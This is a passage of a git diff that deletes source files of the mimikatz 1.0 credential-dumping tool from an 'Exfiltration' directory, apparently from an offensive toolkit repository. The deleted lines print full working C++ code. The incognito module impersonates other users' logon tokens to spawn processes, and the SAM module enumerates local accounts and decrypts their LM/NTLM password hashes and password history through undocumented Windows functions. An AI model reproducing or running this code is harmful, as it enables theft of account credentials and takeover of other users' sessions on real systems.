-	benjamin@gentilkiwi.com
-	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
-	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#pragma once
-#include "../sekurlsa.h"
-
-bool searchCredmanFuncs();
-__kextdll bool __cdecl getCredmanFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments);
-__kextdll bool __cdecl getCredman(mod_pipe * monPipe, vector<wstring> * mesArguments);
-bool WINAPI getCredmanData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity);
-
-wstring descEncryptedCredential(PENCRYPTED_CREDENTIALW pEncryptedCredential, __in bool justSecurity, wstring prefix = L"");
-
-typedef NTSTATUS (WINAPI * PCRED_I_ENUMERATE)	(IN PLUID pLUID, IN DWORD unk0,	IN LPCTSTR Filter, IN DWORD Flags, OUT DWORD *Count, OUT PCREDENTIAL **Credentials);
-typedef NTSTATUS (WINAPI * PCRED_I_ENUMERATE62) (IN PLUID pLUID,				IN LPCTSTR Filter, IN DWORD Flags, OUT DWORD *Count, OUT PCREDENTIAL **Credentials);
-
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.cpp
deleted file mode 100644
index 7284da7..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.cpp
+++ /dev/null
@@ -1,88 +0,0 @@ -/*	Benjamin DELPY `gentilkiwi` -	http://blog.gentilkiwi.com -	benjamin@gentilkiwi.com -	Licence    : http://creativecommons.org/licenses/by/3.0/fr/ -	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "incognito.h" - -bool searchIncognitoFuncs() -{ -	return searchLSAFuncs(); -} - -__kextdll bool __cdecl find_tokens(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ -	vector<pair<PFN_ENUM_BY_LUID, wstring>> monProvider; -	monProvider.push_back(make_pair<PFN_ENUM_BY_LUID, wstring>(getTokenData, wstring(L"token"))); -	return getLogonData(monPipe, mesArguments, &monProvider); -} - -__kextdll bool __cdecl incognito(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ -	wostringstream monStream; -	if(searchIncognitoFuncs()) -	{ -		if(!mesArguments->empty() && ((mesArguments->size() == 3) || (mesArguments->size() == 4))) -		{ -			wstring idSecAppHigh = L"0", idSecAppLow = mesArguments->front(), session = mesArguments->at(1), maLigne = mesArguments->back(); -			if(mesArguments->size() == 4) -			{ -				idSecAppHigh = idSecAppLow; -				idSecAppLow = mesArguments->at(1); -				session = mesArguments->at(2); -			} -			LUID monLUID = mod_text::wstringsToLUID(idSecAppHigh, idSecAppLow); -			DWORD maSession = _wtoi(session.c_str()); -			HANDLE monToken; -			monStream << L" * OpenTokenByLogonId({" << monLUID.LowPart << L";" << monLUID.HighPart << L"}) : "; -			NTSTATUS status = SeckPkgFunctionTable->OpenTokenByLogonId(&monLUID, &monToken); -			if(NT_SUCCESS(status)) -			{ -				monStream << L"OK !" << endl << -					L" * SetTokenInformation(TokenSessionId@" << maSession << L") : "; -				if(SetTokenInformation(monToken, TokenSessionId, &maSession, sizeof(DWORD)) != 0) -				{ -					monStream << L"OK !" 
<< endl << -						L" * CreateProcessAsUser(Token@{" << monLUID.LowPart << L";" << monLUID.HighPart << L"}, TokenSessionId@" << maSession << L", \"" << maLigne << L"\") : "; -					PROCESS_INFORMATION mesInfosProcess; -					if(mod_process::start(&maLigne, &mesInfosProcess, false, false, monToken)) -					{ -						monStream << L"OK - pid = " << mesInfosProcess.dwProcessId << endl; -						CloseHandle(mesInfosProcess.hThread); -						CloseHandle(mesInfosProcess.hProcess); -					} -					else monStream << L"KO - " << mod_system::getWinError() << endl; -					CloseHandle(monToken); -				} -				else monStream << L"KO - " << mod_system::getWinError() << endl; -			} -			else monStream << L"KO - " << mod_system::getWinError(false, status) << endl; -		} -		else monStream << L"Format d\'appel invalide : incognito [idSecAppHigh] idSecAppLow sessionDst ligneDeCommande" << endl;		 -	} -	return sendTo(monPipe, monStream.str()); -} - -bool WINAPI getTokenData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity) -{ -	wostringstream monStream; -	if(searchIncognitoFuncs()) -	{ -		HANDLE monToken; -		NTSTATUS status = SeckPkgFunctionTable->OpenTokenByLogonId(logId, &monToken); -		if(NT_SUCCESS(status)) -		{ -			monStream << L"Disponible !"; -			DWORD maSession, tailleRetournee; -			if(GetTokenInformation(monToken, TokenSessionId, &maSession, sizeof(DWORD), &tailleRetournee) != 0) -			{ -				monStream << L" - session d\'origine " << maSession; -				CloseHandle(monToken); -			} -			else monStream << L"Indisponible - SetTokenInformation KO : " << mod_system::getWinError() << endl; -		} -		else monStream << L"OpenTokenByLogonId KO : " << mod_system::getWinError(false, status) << endl; -	} -	return sendTo(monPipe, monStream.str()); -}
\ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.h
deleted file mode 100644
index a8eae58..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.h
+++ /dev/null
@@ -1,13 +0,0 @@
-/*	Benjamin DELPY `gentilkiwi`
-	http://blog.gentilkiwi.com
-	benjamin@gentilkiwi.com
-	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
-	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#pragma once
-#include "../sekurlsa.h"
-
-bool searchIncognitoFuncs();
-__kextdll bool __cdecl find_tokens(mod_pipe * monPipe, vector<wstring> * mesArguments);
-__kextdll bool __cdecl incognito(mod_pipe * monPipe, vector<wstring> * mesArguments);
-bool WINAPI getTokenData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity);
\ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.cpp
deleted file mode 100644
index 5555b58..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.cpp
+++ /dev/null
@@ -1,479 +0,0 @@
-/*	Benjamin DELPY `gentilkiwi`
-	http://blog.gentilkiwi.com
-	benjamin@gentilkiwi.com
-	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
-	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#include "sam.h"
-
-PSAM_I_CONNECT SamIConnect = reinterpret_cast<PSAM_I_CONNECT>(NULL);
-PSAM_R_OPEN_DOMAIN SamrOpenDomain = reinterpret_cast<PSAM_R_OPEN_DOMAIN>(NULL);
-PSAM_R_OPEN_USER SamrOpenUser = reinterpret_cast<PSAM_R_OPEN_USER>(NULL);
-PSAM_R_ENUMERATE_USERS_IN_DOMAIN SamrEnumerateUsersInDomain = reinterpret_cast<PSAM_R_ENUMERATE_USERS_IN_DOMAIN>(NULL);
-PSAM_R_QUERY_INFORMATION_USER SamrQueryInformationUser = reinterpret_cast<PSAM_R_QUERY_INFORMATION_USER>(NULL);
-PSAM_I_FREE_SAMPR_USER_INFO_BUFFER SamIFree_SAMPR_USER_INFO_BUFFER = reinterpret_cast<PSAM_I_FREE_SAMPR_USER_INFO_BUFFER>(NULL);
-PSAM_I_FREE_SAMPR_ENUMERATION_BUFFER SamIFree_SAMPR_ENUMERATION_BUFFER = reinterpret_cast<PSAM_I_FREE_SAMPR_ENUMERATION_BUFFER>(NULL);
-PSAM_R_CLOSE_HANDLE SamrCloseHandle = reinterpret_cast<PSAM_R_CLOSE_HANDLE>(NULL);
-PSAM_I_GET_PRIVATE_DATA SamIGetPrivateData = reinterpret_cast<PSAM_I_GET_PRIVATE_DATA>(NULL);
-PSYSTEM_FUNCTION_025 SystemFunction025 = reinterpret_cast<PSYSTEM_FUNCTION_025>(NULL);
-PSYSTEM_FUNCTION_027 SystemFunction027 = reinterpret_cast<PSYSTEM_FUNCTION_027>(NULL);
-
-bool searchSAMFuncs()
-{
-	if(!(SamIConnect &&
-		SamrOpenDomain &&
-		SamrOpenUser &&
-		SamrEnumerateUsersInDomain &&
-		SamrQueryInformationUser &&
-		SamIFree_SAMPR_USER_INFO_BUFFER &&
-		SamIFree_SAMPR_ENUMERATION_BUFFER &&
-		SamrCloseHandle &&
-		SamIGetPrivateData &&
-		SystemFunction025 &&
-		SystemFunction027))
-	{
-		HMODULE hSamsrv = GetModuleHandle(L"samsrv");
-		HMODULE hAdvapi32 = GetModuleHandle(L"advapi32");
-
-		if(hSamsrv && hAdvapi32)
-		{
-			SamIConnect = reinterpret_cast<PSAM_I_CONNECT>(GetProcAddress(hSamsrv, "SamIConnect"));
-			SamrOpenDomain = reinterpret_cast<PSAM_R_OPEN_DOMAIN>(GetProcAddress(hSamsrv, "SamrOpenDomain"));
-			
SamrOpenUser = reinterpret_cast<PSAM_R_OPEN_USER>(GetProcAddress(hSamsrv, "SamrOpenUser"));
-			SamrEnumerateUsersInDomain = reinterpret_cast<PSAM_R_ENUMERATE_USERS_IN_DOMAIN>(GetProcAddress(hSamsrv, "SamrEnumerateUsersInDomain"));
-			SamrQueryInformationUser = reinterpret_cast<PSAM_R_QUERY_INFORMATION_USER>(GetProcAddress(hSamsrv, "SamrQueryInformationUser"));
-			SamIFree_SAMPR_USER_INFO_BUFFER = reinterpret_cast<PSAM_I_FREE_SAMPR_USER_INFO_BUFFER>(GetProcAddress(hSamsrv, "SamIFree_SAMPR_USER_INFO_BUFFER"));
-			SamIFree_SAMPR_ENUMERATION_BUFFER = reinterpret_cast<PSAM_I_FREE_SAMPR_ENUMERATION_BUFFER>(GetProcAddress(hSamsrv, "SamIFree_SAMPR_ENUMERATION_BUFFER"));
-			SamrCloseHandle = reinterpret_cast<PSAM_R_CLOSE_HANDLE>(GetProcAddress(hSamsrv, "SamrCloseHandle"));
-			SamIGetPrivateData = reinterpret_cast<PSAM_I_GET_PRIVATE_DATA>(GetProcAddress(hSamsrv, "SamIGetPrivateData"));
-			SystemFunction025 = reinterpret_cast<PSYSTEM_FUNCTION_025>(GetProcAddress(hAdvapi32, "SystemFunction025"));
-			SystemFunction027 = reinterpret_cast<PSYSTEM_FUNCTION_027>(GetProcAddress(hAdvapi32, "SystemFunction027"));
-		}
-		return (SamIConnect &&
-			SamrOpenDomain &&
-			SamrOpenUser &&
-			SamrEnumerateUsersInDomain &&
-			SamrQueryInformationUser &&
-			SamIFree_SAMPR_USER_INFO_BUFFER &&
-			SamIFree_SAMPR_ENUMERATION_BUFFER &&
-			SamrCloseHandle);
-	}
-	else return true;
-}
-
-__kextdll bool __cdecl getSAMFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments)
-{
-	wostringstream monStream;
-	monStream << L"** samsrv.dll/advapi32.dll ** ; Statut recherche : " << (searchSAMFuncs() ? 
L"OK :)" : L"KO :(") << endl << endl <<
-		L"@SamIConnect                       = " << SamIConnect << endl <<
-		L"@SamrOpenDomain                    = " << SamrOpenDomain << endl <<
-		L"@SamrOpenUser                      = " << SamrOpenUser << endl <<
-		L"@SamrEnumerateUsersInDomain        = " << SamrEnumerateUsersInDomain << endl <<
-		L"@SamrQueryInformationUser          = " << SamrQueryInformationUser << endl <<
-		L"@SamIFree_SAMPR_USER_INFO_BUFFER   = " << SamIFree_SAMPR_USER_INFO_BUFFER << endl <<
-		L"@SamIFree_SAMPR_ENUMERATION_BUFFER = " << SamIFree_SAMPR_ENUMERATION_BUFFER << endl <<
-		L"@SamrCloseHandle                   = " << SamrCloseHandle << endl <<
-		L"@SamIGetPrivateData                = " << SamIGetPrivateData << endl <<
-		L"@SystemFunction025                 = " << SystemFunction025 << endl <<
-		L"@SystemFunction027                 = " << SystemFunction027 << endl;
-	return sendTo(monPipe, monStream.str());
-}
-
-__kextdll bool __cdecl getLocalAccounts(mod_pipe * monPipe, vector<wstring> * mesArguments)
-{
-	if(searchSAMFuncs())
-	{
-		bool sendOk = true, history = true, isCSV = false;
-		USER_INFORMATION_CLASS monType = UserInternal1Information;
-
-		if(!mesArguments->empty())
-		{
-			isCSV = ((_wcsicmp(mesArguments->front().c_str(), L"/csv") == 0) || _wcsicmp(mesArguments->back().c_str(), L"/csv") == 0);
-			monType = (((_wcsicmp(mesArguments->front().c_str(), L"/full") == 0) || _wcsicmp(mesArguments->back().c_str(), L"/full") == 0) ? 
UserAllInformation : UserInternal1Information);
-		}
-
-		LSA_HANDLE handlePolicy = NULL;
-		HSAM handleSam = NULL;
-		HDOMAIN handleDomain = NULL;
-		HUSER handleUser = NULL;
-
-		LSA_OBJECT_ATTRIBUTES objectAttributes;
-		memset(&objectAttributes, NULL, sizeof(objectAttributes));
-		PPOLICY_ACCOUNT_DOMAIN_INFO ptrPolicyDomainInfo;
-
-		NTSTATUS retourEnum = 0;
-		PSAMPR_ENUMERATION_BUFFER ptrStructEnumUser = NULL;
-		DWORD EnumerationContext = 0;
-		DWORD EnumerationSize = 0;
-
-		PSAMPR_USER_INFO_BUFFER ptrMesInfosUsers = NULL;
-
-		if(NT_SUCCESS(LsaOpenPolicy(NULL, &objectAttributes, POLICY_ALL_ACCESS, &handlePolicy)))
-		{
-			if(NT_SUCCESS(LsaQueryInformationPolicy(handlePolicy, PolicyAccountDomainInformation, reinterpret_cast<PVOID *>(&ptrPolicyDomainInfo))))
-			{
-				if(NT_SUCCESS(SamIConnect(NULL, &handleSam, 1, SAM_SERVER_CONNECT)))
-				{
-					if(NT_SUCCESS(SamrOpenDomain(handleSam, DOMAIN_ALL_ACCESS, ptrPolicyDomainInfo->DomainSid, &handleDomain)))
-					{
-						wstring domainName = mod_text::stringOfSTRING(ptrPolicyDomainInfo->DomainName);
-						do
-						{
-							retourEnum = SamrEnumerateUsersInDomain(handleDomain, &EnumerationContext, NULL, &ptrStructEnumUser, 1000, &EnumerationSize);
-							if(NT_SUCCESS(retourEnum) || retourEnum == STATUS_MORE_ENTRIES)
-							{
-								for(DWORD numUser = 0; numUser < ptrStructEnumUser->EntriesRead && sendOk; numUser++)
-								{
-									wstring monUserName = mod_text::stringOfSTRING(ptrStructEnumUser->Buffer[numUser].Name);
-									ptrMesInfosUsers = NULL;
-
-									if(NT_SUCCESS(SamrOpenUser(handleDomain, USER_ALL_ACCESS, ptrStructEnumUser->Buffer[numUser].RelativeId, &handleUser)))
-									{
-										if(NT_SUCCESS(SamrQueryInformationUser(handleUser, monType, &ptrMesInfosUsers)))
-										{
-											WUserAllInformation mesInfos = UserInformationsToStruct(monType, ptrMesInfosUsers);
-											mesInfos.UserId = ptrStructEnumUser->Buffer[numUser].RelativeId;
-											
mesInfos.DomaineName = mod_text::stringOfSTRING(ptrPolicyDomainInfo->DomainName);
-
-											if(mesInfos.UserName.empty())
-												mesInfos.UserName = mod_text::stringOfSTRING(ptrStructEnumUser->Buffer[numUser].Name);
-
-											sendOk = descrToPipeInformations(monPipe, monType, mesInfos, isCSV);
-											SamIFree_SAMPR_USER_INFO_BUFFER(ptrMesInfosUsers, monType);
-										}
-										 
-										if(history && SamIGetPrivateData != NULL)
-										{
-											sendOk = descrUserHistoryToPipe(monPipe, ptrStructEnumUser->Buffer[numUser].RelativeId, monUserName, domainName, handleUser, monType, isCSV);
-										}
-										SamrCloseHandle(reinterpret_cast<PHANDLE>(&handleUser));
-									}
-									else sendOk = sendTo(monPipe, L"Impossible d\'ouvrir l\'objet utilisateur\n");
-								}
-								SamIFree_SAMPR_ENUMERATION_BUFFER(ptrStructEnumUser);
-							}
-							else sendOk = sendTo(monPipe, L"Echec dans l\'obtention de la liste des objets\n");
-
-						} while(retourEnum == STATUS_MORE_ENTRIES && sendOk);
-						SamrCloseHandle(reinterpret_cast<PHANDLE>(&handleDomain));
-					}
-					else sendOk = sendTo(monPipe, L"Impossible d\'obtenir les information sur le domaine\n");
-					SamrCloseHandle(reinterpret_cast<PHANDLE>(&handleSam));
-				}
-				else sendOk = sendTo(monPipe, L"Impossible de se connecter à la base de sécurité du domaine\n");
-				LsaFreeMemory(ptrPolicyDomainInfo);
-			}
-			else sendOk = sendTo(monPipe, L"Impossible d\'obtenir des informations sur la politique de sécurité\n");
-			LsaClose(handlePolicy);
-		}
-		else sendOk = sendTo(monPipe, L"Impossible d\'ouvrir la politique de sécurité\n");
-
-		return sendOk;
-	}
-	else return getSAMFunctions(monPipe, mesArguments);
-}
-
-bool descrToPipeInformations(mod_pipe * monPipe, USER_INFORMATION_CLASS type, WUserAllInformation & mesInfos, bool isCSV)
-{
-	wstringstream maReponse;
-
-	switch(type)
-	{
-	case UserInternal1Information:
-		if(isCSV)
-		{
-			maReponse <<
-				
mesInfos.UserId << L";" <<
-				mesInfos.UserName << L";" <<
-				mesInfos.DomaineName << L";" <<
-				mesInfos.LmOwfPassword << L";" <<
-				mesInfos.NtOwfPassword << L";"
-				;
-		}
-		else
-		{
-			maReponse << 
-				L"ID                      : " << mesInfos.UserId << endl <<
-				L"Nom                     : " << mesInfos.UserName << endl <<
-				L"Domaine                 : " << mesInfos.DomaineName << endl <<
-				L"Hash LM                 : " << mesInfos.LmOwfPassword << endl <<
-				L"Hash NTLM               : " << mesInfos.NtOwfPassword << endl
-				;
-		}
-		break;
-	case UserAllInformation:
-		if(isCSV)
-		{
-			maReponse <<
-				mesInfos.UserId << L';' <<
-				mesInfos.UserName << L';' <<
-				mesInfos.DomaineName << L';' <<
-				protectMe(mesInfos.FullName) << L';' <<
-				mesInfos.isActif << L';' <<
-				mesInfos.isLocked << L';' <<
-				mesInfos.TypeCompte << L';' <<
-				protectMe(mesInfos.UserComment) << L';' <<
-				protectMe(mesInfos.AdminComment) << L';' <<
-				mesInfos.AccountExpires_strict << L';' <<
-				protectMe(mesInfos.WorkStations) << L';' <<
-				protectMe(mesInfos.HomeDirectory) << L';' <<
-				protectMe(mesInfos.HomeDirectoryDrive) << L';' <<
-				protectMe(mesInfos.ProfilePath) << L';' <<
-				protectMe(mesInfos.ScriptPath) << L';' <<
-				mesInfos.LogonCount << L';' <<
-				mesInfos.BadPasswordCount << L';' <<
-				mesInfos.LastLogon_strict << L';' <<
-				mesInfos.LastLogoff_strict << L';' <<
-				mesInfos.PasswordLastSet_strict << L';' <<
-				mesInfos.isPasswordNotExpire << L';' <<
-				mesInfos.isPasswordNotRequired << L';' <<
-				mesInfos.isPasswordExpired << L';' <<
-				mesInfos.PasswordCanChange_strict << L';' <<
-				mesInfos.PasswordMustChange_strict << L';' <<
-				mesInfos.LmOwfPassword << L';' <<
-				mesInfos.NtOwfPassword << L';'
-				;
-		}
-		else
-		{
-			maReponse << boolalpha <<
-				L"Compte" << endl <<
-				L"======" << endl <<
-				L"ID                      : " << mesInfos.UserId << endl <<
-				L"Nom         
            : " << mesInfos.UserName << endl <<
-				L"Domaine                 : " << mesInfos.DomaineName << endl <<
-				L"Nom complet             : " << mesInfos.FullName << endl <<
-				L"Actif                   : " << mesInfos.isActif << endl <<
-				L"Verouillé               : " << mesInfos.isLocked << endl <<
-				L"Type                    : " << mesInfos.TypeCompte << endl <<
-				L"Commentaire utilisateur : " << mesInfos.UserComment << endl <<
-				L"Commentaire admin       : " << mesInfos.AdminComment << endl <<
-				L"Expiration              : " << mesInfos.AccountExpires << endl <<
-				L"Station(s)              : " << mesInfos.WorkStations << endl <<
-				endl <<
-				L"Chemins" << endl <<
-				L"-------" << endl <<
-				L"Répertoire de base      : " << mesInfos.HomeDirectory << endl <<
-				L"Lecteur de base         : " << mesInfos.HomeDirectoryDrive << endl <<
-				L"Profil                  : " << mesInfos.ProfilePath << endl <<
-				L"Script de démarrage     : " << mesInfos.ScriptPath << endl <<
-				endl <<
-				L"Connexions" << endl <<
-				L"----------" << endl <<
-				L"Nombre                  : " << mesInfos.LogonCount << endl <<
-				L"Echecs                  : " << mesInfos.BadPasswordCount << endl <<
-				L"Dernière connexion      : " << mesInfos.LastLogon << endl <<
-				L"Dernière déconnexion    : " << mesInfos.LastLogoff << endl <<
-				endl <<
-				L"Mot de passe" << endl <<
-				L"------------" << endl <<
-				L"Dernier changement      : " << mesInfos.PasswordLastSet << endl <<
-				L"N\'expire pas            : " << mesInfos.isPasswordNotExpire << endl <<
-				L"Peut être vide          : " << mesInfos.isPasswordNotRequired << endl <<
-				L"Mot de passe expiré     : " << mesInfos.isPasswordExpired << endl <<
-				L"Possibilité changement  : " << mesInfos.PasswordCanChange << endl <<
-				L"Obligation changement   : " << mesInfos.PasswordMustChange << endl <<
-				endl <<			 
-				L"Hashs" << endl <<
-				L"-----" << endl <<
-				L"Hash 
LM                 : " << mesInfos.LmOwfPassword << endl <<
-				L"Hash NTLM               : " << mesInfos.NtOwfPassword << endl <<
-				endl
-				;
-		}
-		break;
-	}
-
-	maReponse << endl;
-	return sendTo(monPipe, maReponse.str());
-}
-
-WUserAllInformation UserInformationsToStruct(USER_INFORMATION_CLASS type, PSAMPR_USER_INFO_BUFFER & monPtr)
-{
-	WUserAllInformation mesInfos;
-	PSAMPR_USER_INTERNAL1_INFORMATION ptrPassword = NULL;
-	PSAMPR_USER_ALL_INFORMATION ptrAllInformations = NULL;
-
-	switch(type)
-	{
-	case UserInternal1Information:
-		ptrPassword = reinterpret_cast<PSAMPR_USER_INTERNAL1_INFORMATION>(monPtr);
-
-		mesInfos.LmPasswordPresent = ptrPassword->LmPasswordPresent != 0;
-		mesInfos.NtPasswordPresent = ptrPassword->NtPasswordPresent != 0;
-
-		if(mesInfos.LmPasswordPresent)
-			mesInfos.LmOwfPassword = mod_text::stringOfHex(ptrPassword->EncryptedLmOwfPassword.data, sizeof(ptrPassword->EncryptedLmOwfPassword.data));
-		if(mesInfos.NtPasswordPresent)
-			mesInfos.LmOwfPassword = mod_text::stringOfHex(ptrPassword->EncryptedNtOwfPassword.data, sizeof(ptrPassword->EncryptedNtOwfPassword.data));
-		break;
-
-	case UserAllInformation:
-		ptrAllInformations = reinterpret_cast<PSAMPR_USER_ALL_INFORMATION>(monPtr);
-
-		mesInfos.UserId = ptrAllInformations->UserId;
-		mesInfos.UserName = mod_text::stringOfSTRING(ptrAllInformations->UserName);
-		mesInfos.FullName = mod_text::stringOfSTRING(ptrAllInformations->FullName); correctMe(mesInfos.FullName);
-		 
-		mesInfos.isActif = (ptrAllInformations->UserAccountControl & USER_ACCOUNT_DISABLED) == 0;
-		mesInfos.isLocked = (ptrAllInformations->UserAccountControl & USER_ACCOUNT_AUTO_LOCKED) != 0;
-
-		if(ptrAllInformations->UserAccountControl & USER_SERVER_TRUST_ACCOUNT)
-			mesInfos.TypeCompte.assign(L"Contrôleur de domaine");
-		else if(ptrAllInformations->UserAccountControl & USER_WORKSTATION_TRUST_ACCOUNT)
-			mesInfos.TypeCompte.assign(L"Ordinateur");
-		else if(ptrAllInformations->UserAccountControl & 
USER_NORMAL_ACCOUNT)
-			mesInfos.TypeCompte.assign(L"Utilisateur");
-		else
-			mesInfos.TypeCompte.assign(L"Inconnu");
-
-		mesInfos.UserComment = mod_text::stringOfSTRING(ptrAllInformations->UserComment); correctMe(mesInfos.AdminComment);
-		mesInfos.AdminComment = mod_text::stringOfSTRING(ptrAllInformations->AdminComment); correctMe(mesInfos.AdminComment);
-		mesInfos.AccountExpires = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->AccountExpires);
-		mesInfos.AccountExpires_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->AccountExpires, true);
-		mesInfos.WorkStations = mod_text::stringOfSTRING(ptrAllInformations->WorkStations);
-		mesInfos.HomeDirectory = mod_text::stringOfSTRING(ptrAllInformations->HomeDirectory); correctMe(mesInfos.HomeDirectory);
-		mesInfos.HomeDirectoryDrive = mod_text::stringOfSTRING(ptrAllInformations->HomeDirectoryDrive); correctMe(mesInfos.HomeDirectoryDrive);
-		mesInfos.ProfilePath = mod_text::stringOfSTRING(ptrAllInformations->ProfilePath); correctMe(mesInfos.ProfilePath);
-		mesInfos.ScriptPath = mod_text::stringOfSTRING(ptrAllInformations->ScriptPath); correctMe(mesInfos.ScriptPath);
-		mesInfos.LogonCount = ptrAllInformations->LogonCount;
-		mesInfos.BadPasswordCount = ptrAllInformations->BadPasswordCount;
-		mesInfos.LastLogon = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->LastLogon);
-		mesInfos.LastLogon_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->LastLogon, true);
-		mesInfos.LastLogoff = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->LastLogoff);
-		mesInfos.LastLogoff_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->LastLogoff, true);
-		mesInfos.PasswordLastSet = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordLastSet);
-		mesInfos.PasswordLastSet_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordLastSet, true);
-		mesInfos.isPasswordNotExpire = (ptrAllInformations->UserAccountControl & USER_DONT_EXPIRE_PASSWORD) != 0;
-		mesInfos.isPasswordNotRequired = 
(ptrAllInformations->UserAccountControl & USER_PASSWORD_NOT_REQUIRED) != 0;
-		mesInfos.isPasswordExpired = ptrAllInformations->PasswordExpired != 0;
-		mesInfos.PasswordCanChange = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordCanChange);
-		mesInfos.PasswordCanChange_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordCanChange, true);
-		mesInfos.PasswordMustChange = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordMustChange);
-		mesInfos.PasswordMustChange_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordMustChange, true);
-		mesInfos.LmPasswordPresent = ptrAllInformations->LmPasswordPresent != 0;
-		mesInfos.NtPasswordPresent = ptrAllInformations->NtPasswordPresent != 0;
-
-		if(mesInfos.LmPasswordPresent)
-			mesInfos.LmOwfPassword = mod_text::stringOfHex(reinterpret_cast<BYTE *>(ptrAllInformations->LmOwfPassword.Buffer), ptrAllInformations->LmOwfPassword.Length);
-		if(mesInfos.NtPasswordPresent)
-			mesInfos.LmOwfPassword = mod_text::stringOfHex(reinterpret_cast<BYTE *>(ptrAllInformations->NtOwfPassword.Buffer), ptrAllInformations->NtOwfPassword.Length);
-
-		break;
-	}
-	return mesInfos;
-}
-
-bool descrUserHistoryToPipe(mod_pipe * monPipe, DWORD rid, wstring monUserName, wstring domainName, HUSER handleUser, USER_INFORMATION_CLASS type, bool isCSV)
-{
-	WUserAllInformation mesInfos;
-	mesInfos.DomaineName = domainName;
-	mesInfos.UserId = rid;
-
-	DWORD Context = 2, Type = 0, tailleBlob;
-	PWHashHistory pMesDatas = NULL;
-	bool sendOk = true;
-	 
-	if(NT_SUCCESS(SamIGetPrivateData(handleUser, &Context, &Type, &tailleBlob, &pMesDatas)))
-	{
-		unsigned short nbEntrees = min(pMesDatas->histNTLMsize, pMesDatas->histLMsize) / 16;
-
-		for(unsigned short i = 1; i < nbEntrees && sendOk; i++)
-		{
-			BYTE monBuff[16] = {0};
-
-			wostringstream userNameQualif;
-			userNameQualif << monUserName << L"{p-" << i << L"}";
-			mesInfos.UserName = userNameQualif.str();
-			 
-			
if(NT_SUCCESS(SystemFunction025(pMesDatas->hashs[nbEntrees + i], &rid, monBuff)))
-			{
-				mesInfos.LmPasswordPresent = 1;
-				mesInfos.LmOwfPassword = mod_text::stringOfHex(monBuff, 0x10);
-			}
-			else
-			{
-				mesInfos.LmPasswordPresent = 0;
-				mesInfos.LmOwfPassword = L"échec de décodage :(";
-			}
-
-			if(NT_SUCCESS(SystemFunction027(pMesDatas->hashs[i], &rid, monBuff)))
-			{
-				mesInfos.NtPasswordPresent = 1;
-				mesInfos.NtOwfPassword = mod_text::stringOfHex(monBuff, 0x10);
-			}
-			else
-			{
-				mesInfos.NtPasswordPresent = 0;
-				mesInfos.NtOwfPassword = L"échec de décodage :(";
-			}
-
-			sendOk = descrToPipeInformations(monPipe, type, mesInfos, isCSV);
-		}
-		LocalFree(pMesDatas);
-	}
-	return sendOk;
-}
-
-wstring toTimeFromOLD_LARGE_INTEGER(OLD_LARGE_INTEGER & monInt, bool isStrict)
-{
-	wostringstream reponse;
-
-	if(monInt.LowPart == ULONG_MAX && monInt.HighPart == LONG_MAX)
-	{
-		if(!isStrict)
-			reponse << L"N\'arrive jamais";
-	}
-	else if(monInt.LowPart == 0 && monInt.HighPart == 0)
-	{
-		if(!isStrict)
-			reponse << L"N\'est pas encore arrivé";
-	}
-	else
-	{
-		SYSTEMTIME monTimeStamp;
-		if(FileTimeToSystemTime(reinterpret_cast<PFILETIME>(&monInt), &monTimeStamp) != FALSE)
-		{
-			reponse << dec << 
-				setw(2)<< setfill(wchar_t('0')) << monTimeStamp.wDay << L"/" <<
-				setw(2)<< setfill(wchar_t('0')) << monTimeStamp.wMonth << L"/" <<
-				setw(4)<< setfill(wchar_t('0')) << monTimeStamp.wYear << L" " <<
-				setw(2)<< setfill(wchar_t('0')) << monTimeStamp.wHour << L":" << 
-				setw(2)<< setfill(wchar_t('0')) << monTimeStamp.wMinute << L":" << 
-				setw(2)<< setfill(wchar_t('0')) << monTimeStamp.wSecond;
-		}
-	}
-	return reponse.str();
-}
-
-wstring protectMe(wstring &maChaine)
-{
-	wstring result;
-	if(!maChaine.empty())
-	{
-		result = L"\"";
-		result.append(maChaine);
-		result.append(L"\"");
-	}
-	return result;
-}
-
-void correctMe(wstring &maChaine)
-{
-	unsigned char source[] = {0x19, 0x20, 0x13, 0x20, 0xab, 
0x00, 0xbb, 0x00, 0x26, 0x20};
-	unsigned char replac[] = {'\'', 0   , '-' , 0   , '\"', 0   , '\"', 0,    '.',  0   };
-
-	for(unsigned int i = 0; i < maChaine.size() ; i++)
-	{
